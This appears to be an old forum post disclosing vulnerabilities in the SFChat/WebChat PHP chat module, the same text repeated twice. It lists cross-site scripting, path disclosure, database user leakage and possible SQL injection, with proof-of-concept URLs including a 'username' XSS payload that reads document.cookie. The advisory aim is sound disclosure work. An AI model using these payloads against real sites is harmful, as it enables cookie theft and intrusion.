CourtneyDS
Baseband Member
- Messages
- 56
Vulnerability Type : XSS (Cross Site Scripting).. Path Disclosure.. revealed of DBUser Name.. possible SQL injection ...
SFChat & WebChat are very good and stable systems of chat online.. but they indeed have there faults ...
Our findings prior to notifying the source writer along with our associates around the web ...
Warning : Access denied for user: you@localhost (Using password:
YES) in /home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php
DataBase error will read : Link_ID == false, connect failed ...
MySQL error : 0 () Session halted ...
Path disclosure :
http://www.you.com/modules/WebChat/in.php </redirect.php?http://www.you.com/modules/WebChat/in.php>
http://www.you.com/modules/WebChat/quit.php </redirect.php?http://www.you.com/modules/WebChat/quit.php>
http://www.you.com/modules/WebChat/users.php </redirect.php?http://www.you.com/modules/WebChat/users.php>
]http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code] </redirect.php?http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code>
=">alert(document.cookie);http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=">alert(document.cookie); </redirect.php?http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username>
Solution :
To Fix the script temporarily.. you must erase this script off your Web.. or change its name so that nobody has access to it ... You have to search the site of the writer / programmer in search of the new patch.. to be able to continue using this chat ...
This information was released only yesterday 06 - 02 - 03 and there is no immediate patch available ...
Sincerely
CourtneyDS
SFChat & WebChat are very good and stable systems of chat online.. but they indeed have there faults ...
Our findings prior to notifying the source writer along with our associates around the web ...
Warning : Access denied for user: you@localhost (Using password:
YES) in /home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php
DataBase error will read : Link_ID == false, connect failed ...
MySQL error : 0 () Session halted ...
Path disclosure :
http://www.you.com/modules/WebChat/in.php </redirect.php?http://www.you.com/modules/WebChat/in.php>
http://www.you.com/modules/WebChat/quit.php </redirect.php?http://www.you.com/modules/WebChat/quit.php>
http://www.you.com/modules/WebChat/users.php </redirect.php?http://www.you.com/modules/WebChat/users.php>
]http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code] </redirect.php?http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code>
=">alert(document.cookie);http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=">alert(document.cookie); </redirect.php?http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username>
Solution :
To Fix the script temporarily.. you must erase this script off your Web.. or change its name so that nobody has access to it ... You have to search the site of the writer / programmer in search of the new patch.. to be able to continue using this chat ...
This information was released only yesterday 06 - 02 - 03 and there is no immediate patch available ...
Sincerely
CourtneyDS
